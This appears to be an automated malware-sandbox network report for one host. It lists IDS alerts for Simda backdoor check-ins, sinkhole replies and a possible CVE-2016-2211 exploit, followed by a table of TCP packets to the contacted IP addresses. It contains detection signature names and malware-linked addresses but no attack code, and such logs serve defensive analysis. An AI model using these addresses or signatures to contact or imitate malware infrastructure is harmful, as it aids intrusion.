2024-11-11T18:13:08.496239+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58871	188.114.96.3	80	TCP
2024-11-11T18:13:11.604926+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58899	188.114.96.3	443	TCP
2024-11-11T18:13:12.961856+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58927	64.225.91.73	80	TCP
2024-11-11T18:13:13.401820+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	62035	44.221.84.105	80	TCP
2024-11-11T18:13:13.403376+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	62034	76.223.67.189	80	TCP
2024-11-11T18:13:13.523144+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	62036	103.224.212.210	80	TCP
2024-11-11T18:13:13.737443+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	62038	103.224.182.252	80	TCP
2024-11-11T18:13:13.807991+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	62037	154.85.183.50	80	TCP
2024-11-11T18:13:14.143551+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	62037	154.85.183.50	80	TCP
2024-11-11T18:13:14.637457+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.6	62044	TCP
2024-11-11T18:13:16.408689+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	61112	64.225.91.73	80	TCP
2024-11-11T18:13:16.641080+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	55436	72.52.179.174	80	TCP
2024-11-11T18:13:17.174275+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	55442	72.52.179.174	80	TCP
2024-11-11T18:13:20.604330+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	52002	52.34.198.229	80	TCP
2024-11-11T18:13:20.611365+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	52.34.198.229	80	192.168.2.6	52002	TCP
2024-11-11T18:13:20.611365+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	52.34.198.229	80	192.168.2.6	52002	TCP
2024-11-11T18:13:23.313714+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	55368	44.221.84.105	80	TCP
2024-11-11T18:13:24.994411+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49712	154.212.231.82	80	TCP
2024-11-11T18:13:25.072707+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63292	99.83.170.3	80	TCP
2024-11-11T18:13:25.108038+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58859	188.114.96.3	80	TCP
2024-11-11T18:13:25.154690+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63293	85.17.31.82	80	TCP
2024-11-11T18:13:25.189398+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49709	208.100.26.245	80	TCP
2024-11-11T18:13:25.196354+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63294	23.253.46.64	80	TCP
2024-11-11T18:13:25.409596+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49712	154.212.231.82	80	TCP
2024-11-11T18:13:25.499222+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49709	208.100.26.245	80	TCP
2024-11-11T18:13:25.524137+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63298	199.59.243.227	80	TCP
2024-11-11T18:13:25.859716+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63299	99.83.170.3	443	TCP
2024-11-11T18:13:25.872635+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63302	85.17.31.82	80	TCP
2024-11-11T18:13:26.150072+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63305	23.253.46.64	80	TCP
2024-11-11T18:13:26.704377+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63303	188.114.96.3	443	TCP
2024-11-11T18:13:27.063539+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58859	188.114.96.3	80	TCP
2024-11-11T18:13:28.835690+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63317	188.114.96.3	443	TCP
2024-11-11T18:13:29.172224+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58877	103.150.10.48	80	TCP
2024-11-11T18:13:29.383530+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58871	188.114.96.3	80	TCP
2024-11-11T18:13:29.751222+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58877	103.150.10.48	80	TCP
2024-11-11T18:13:31.819056+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63420	188.114.96.3	443	TCP
2024-11-11T18:13:32.153310+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58871	188.114.96.3	80	TCP
2024-11-11T18:13:35.478829+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63440	188.114.96.3	443	TCP
2024-11-11T18:13:35.488167+0100	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	1.1.1.1	53	192.168.2.6	50679	UDP
2024-11-11T18:13:36.456276+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	62037	154.85.183.50	80	TCP
2024-11-11T18:13:36.603894+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63471	103.224.212.210	80	TCP
2024-11-11T18:13:36.688747+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63472	103.224.182.252	80	TCP
2024-11-11T18:13:37.366861+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	62037	154.85.183.50	80	TCP
2024-11-11T18:13:37.730038+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63480	3.94.10.34	80	TCP
2024-11-11T18:13:37.730376+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63482	44.221.84.105	80	TCP
2024-11-11T18:13:37.730377+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63483	75.2.71.199	80	TCP
2024-11-11T18:13:37.917100+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63485	18.208.156.248	80	TCP
2024-11-11T18:13:38.055288+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63484	188.114.97.3	80	TCP
2024-11-11T18:13:38.731382+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63481	199.191.50.83	80	TCP
2024-11-11T18:13:39.454604+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63490	75.2.71.199	443	TCP
2024-11-11T18:13:40.398222+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63493	188.114.97.3	443	TCP
2024-11-11T18:13:41.260279+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63484	188.114.97.3	80	TCP
2024-11-11T18:13:41.266761+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63519	85.17.31.82	80	TCP
2024-11-11T18:13:41.278855+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63518	199.59.243.227	80	TCP
2024-11-11T18:13:41.305552+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63522	44.221.84.105	80	TCP
2024-11-11T18:13:41.308273+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63517	23.253.46.64	80	TCP
2024-11-11T18:13:41.312823+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63521	208.100.26.245	80	TCP
2024-11-11T18:13:41.590924+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63525	72.52.179.174	80	TCP
2024-11-11T18:13:41.723444+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	63520	154.212.231.82	80	TCP
2024-11-11T18:13:42.148856+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64177	72.52.179.174	80	TCP
2024-11-11T18:13:44.500644+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	50515	3.94.10.34	80	TCP
2024-11-11T18:13:44.831510+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	50517	199.59.243.227	80	TCP
2024-11-11T18:13:44.831579+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	50518	44.221.84.105	80	TCP
2024-11-11T18:13:44.832038+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	50519	85.17.31.82	80	TCP
2024-11-11T18:13:44.858489+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	50520	44.221.84.105	80	TCP
2024-11-11T18:13:44.886782+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	50521	23.253.46.64	80	TCP
2024-11-11T18:13:44.924237+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	50522	208.100.26.245	80	TCP
2024-11-11T18:13:44.927023+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	50524	75.2.71.199	80	TCP
2024-11-11T18:13:44.928733+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	50525	18.208.156.248	80	TCP
2024-11-11T18:13:45.253290+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64008	188.114.97.3	80	TCP
2024-11-11T18:13:45.368432+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	50523	154.212.231.82	80	TCP
2024-11-11T18:13:46.150235+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59137	75.2.71.199	443	TCP
2024-11-11T18:13:46.654538+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59140	85.17.31.82	80	TCP
2024-11-11T18:13:48.094253+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59144	199.59.243.227	80	TCP
2024-11-11T18:13:48.095790+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59148	44.221.84.105	80	TCP
2024-11-11T18:13:48.095867+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59143	44.221.84.105	80	TCP
2024-11-11T18:13:48.096802+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59149	75.2.71.199	80	TCP
2024-11-11T18:13:48.122409+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59150	208.100.26.245	80	TCP
2024-11-11T18:13:48.122414+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59145	23.253.46.64	80	TCP
2024-11-11T18:13:48.299048+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59139	199.191.50.83	80	TCP
2024-11-11T18:13:48.356584+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59146	188.114.97.3	80	TCP
2024-11-11T18:13:48.550901+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59147	154.212.231.82	80	TCP
2024-11-11T18:13:50.233855+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59153	85.17.31.82	80	TCP
2024-11-11T18:13:50.251240+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59155	199.59.243.227	80	TCP
2024-11-11T18:13:50.256494+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59156	75.2.71.199	80	TCP
2024-11-11T18:13:50.418151+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59159	44.221.84.105	80	TCP
2024-11-11T18:13:50.418617+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59161	3.94.10.34	80	TCP
2024-11-11T18:13:50.502916+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59154	188.114.97.3	80	TCP
2024-11-11T18:13:51.433347+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59157	199.191.50.83	80	TCP
2024-11-11T18:13:55.167613+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59173	18.208.156.248	80	TCP
2024-11-11T18:13:56.506333+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59181	75.2.71.199	80	TCP
2024-11-11T18:14:01.034668+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	56235	23.253.46.64	80	TCP
2024-11-11T18:14:01.034718+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59179	44.221.84.105	80	TCP
2024-11-11T18:14:01.034785+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	56241	154.212.231.82	80	TCP
2024-11-11T18:14:01.034858+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59180	188.114.97.3	80	TCP
2024-11-11T18:14:01.034877+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	59178	44.221.84.105	80	TCP
2024-11-11T18:14:01.034911+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	56239	3.94.10.34	80	TCP
2024-11-11T18:14:01.034931+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	56236	199.59.243.227	80	TCP
2024-11-11T18:14:01.034999+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	56237	208.100.26.245	80	TCP
2024-11-11T18:14:01.035022+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	56238	199.191.50.83	80	TCP
2024-11-11T18:14:01.035083+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	56240	18.208.156.248	80	TCP
2024-11-11T18:14:02.132036+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.6	56242	TCP
2024-11-11T18:14:52.315432+0100	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	1.1.1.1	53	192.168.2.6	53979	UDP
2024-11-11T18:14:52.861243+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64560	162.255.119.102	80	TCP
2024-11-11T18:14:53.017386+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64563	208.100.26.245	80	TCP
2024-11-11T18:14:53.018805+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64564	75.2.71.199	80	TCP
2024-11-11T18:14:53.430822+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64565	44.221.84.105	80	TCP
2024-11-11T18:14:53.430947+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64563	208.100.26.245	80	TCP
2024-11-11T18:14:53.431060+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64562	188.114.97.3	80	TCP
2024-11-11T18:14:53.431330+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64567	199.59.243.227	80	TCP
2024-11-11T18:14:53.431341+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64569	3.94.10.34	80	TCP
2024-11-11T18:14:53.431341+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64570	18.208.156.248	80	TCP
2024-11-11T18:14:53.431383+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64568	44.221.84.105	80	TCP
2024-11-11T18:14:53.668671+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64572	91.195.240.19	80	TCP
2024-11-11T18:14:53.706698+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64566	154.212.231.82	80	TCP
2024-11-11T18:14:53.962120+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64573	75.2.71.199	443	TCP
2024-11-11T18:14:54.081011+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64566	154.212.231.82	80	TCP
2024-11-11T18:14:55.015481+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64571	199.191.50.83	80	TCP
2024-11-11T18:14:55.048956+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64574	188.114.97.3	443	TCP
2024-11-11T18:14:55.488395+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64561	5.79.71.205	80	TCP
2024-11-11T18:14:55.488590+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64575	188.114.97.3	80	TCP
2024-11-11T18:14:59.550793+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64576	5.79.71.205	80	TCP
2024-11-11T18:15:00.260759+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64577	13.248.169.48	80	TCP
2024-11-11T18:15:00.565021+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64579	3.94.10.34	80	TCP
2024-11-11T18:15:00.697014+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64580	18.208.156.248	80	TCP
2024-11-11T18:15:00.725808+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64578	188.114.96.3	80	TCP
2024-11-11T18:15:01.185431+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64581	103.150.10.48	80	TCP
2024-11-11T18:15:03.585249+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64584	103.150.10.48	80	TCP
2024-11-11T18:15:04.331530+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	64582	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 18:13:00.884264946 CET	49707	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:00.887000084 CET	49708	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:00.887423038 CET	49710	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:00.887480021 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:00.890405893 CET	80	49707	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:00.890476942 CET	49707	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:00.890520096 CET	49711	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:00.891082048 CET	49707	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:00.893183947 CET	80	49708	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:00.893243074 CET	49708	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:00.893342018 CET	80	49710	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:00.893353939 CET	80	49709	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:00.893402100 CET	49710	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:00.893512964 CET	49708	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:00.893512964 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:00.893631935 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:00.893734932 CET	49710	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:00.895363092 CET	80	49711	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:00.895426035 CET	49711	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:00.895742893 CET	49711	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:00.895876884 CET	80	49707	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:00.899893999 CET	80	49708	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:00.899907112 CET	80	49709	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:00.901494980 CET	80	49710	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:00.902055025 CET	80	49711	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:00.945907116 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:00.950860023 CET	80	49712	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:00.950951099 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:00.951148033 CET	49712	80	192.168.2.6	154.212.231.82
Nov 11, 2024 18:13:00.955897093 CET	80	49712	154.212.231.82	192.168.2.6
Nov 11, 2024 18:13:00.985682011 CET	49713	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:00.990777969 CET	80	49713	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:00.990850925 CET	49713	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:00.990952969 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:00.995755911 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:00.995821953 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:00.996090889 CET	58859	80	192.168.2.6	188.114.96.3
Nov 11, 2024 18:13:00.999512911 CET	49713	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:01.000859022 CET	80	58859	188.114.96.3	192.168.2.6
Nov 11, 2024 18:13:01.004328966 CET	80	49713	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:01.121813059 CET	58860	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:01.126751900 CET	80	58860	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:01.126821041 CET	58860	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:01.126977921 CET	58860	80	192.168.2.6	199.59.243.227
Nov 11, 2024 18:13:01.131886005 CET	80	58860	199.59.243.227	192.168.2.6
Nov 11, 2024 18:13:01.175029039 CET	58861	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:01.179801941 CET	80	58861	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:01.179868937 CET	58861	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:01.179976940 CET	58861	80	192.168.2.6	99.83.170.3
Nov 11, 2024 18:13:01.184752941 CET	80	58861	99.83.170.3	192.168.2.6
Nov 11, 2024 18:13:01.237085104 CET	58862	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:01.242495060 CET	80	58862	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:01.242568016 CET	58862	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:01.248851061 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:01.250102997 CET	58862	80	192.168.2.6	3.94.10.34
Nov 11, 2024 18:13:01.253752947 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:01.253815889 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:01.253968000 CET	58863	80	192.168.2.6	199.191.50.83
Nov 11, 2024 18:13:01.254877090 CET	80	58862	3.94.10.34	192.168.2.6
Nov 11, 2024 18:13:01.258757114 CET	80	58863	199.191.50.83	192.168.2.6
Nov 11, 2024 18:13:01.308419943 CET	80	49710	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:01.308489084 CET	49710	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:01.308578014 CET	49710	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:01.309510946 CET	58864	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:01.314215899 CET	80	49710	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:01.314673901 CET	80	58864	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:01.314749002 CET	58864	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:01.314892054 CET	58864	80	192.168.2.6	85.17.31.82
Nov 11, 2024 18:13:01.319766998 CET	80	58864	85.17.31.82	192.168.2.6
Nov 11, 2024 18:13:01.323147058 CET	80	49711	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:01.323208094 CET	49711	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:01.323270082 CET	80	49708	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:01.323321104 CET	49708	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:01.328224897 CET	49711	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:01.328735113 CET	49708	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:01.331145048 CET	80	49708	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:01.331202984 CET	49708	80	192.168.2.6	44.221.84.105
Nov 11, 2024 18:13:01.331712008 CET	80	49711	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:01.331764936 CET	49711	80	192.168.2.6	18.208.156.248
Nov 11, 2024 18:13:01.333093882 CET	80	49711	18.208.156.248	192.168.2.6
Nov 11, 2024 18:13:01.333568096 CET	80	49708	44.221.84.105	192.168.2.6
Nov 11, 2024 18:13:01.341805935 CET	80	49709	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:01.341864109 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:01.346458912 CET	49709	80	192.168.2.6	208.100.26.245
Nov 11, 2024 18:13:01.347887039 CET	80	49707	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:01.347927094 CET	80	49707	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:01.347944021 CET	49707	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:01.347970009 CET	49707	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:01.348956108 CET	49707	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:01.348956108 CET	49707	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:01.351264000 CET	80	49709	208.100.26.245	192.168.2.6
Nov 11, 2024 18:13:01.353841066 CET	58865	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:01.359158039 CET	80	58865	23.253.46.64	192.168.2.6
Nov 11, 2024 18:13:01.359225988 CET	58865	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:01.359357119 CET	58865	80	192.168.2.6	23.253.46.64
Nov 11, 2024 18:13:01.364161015 CET	80	58865	23.253.46.64	192.168.2.6
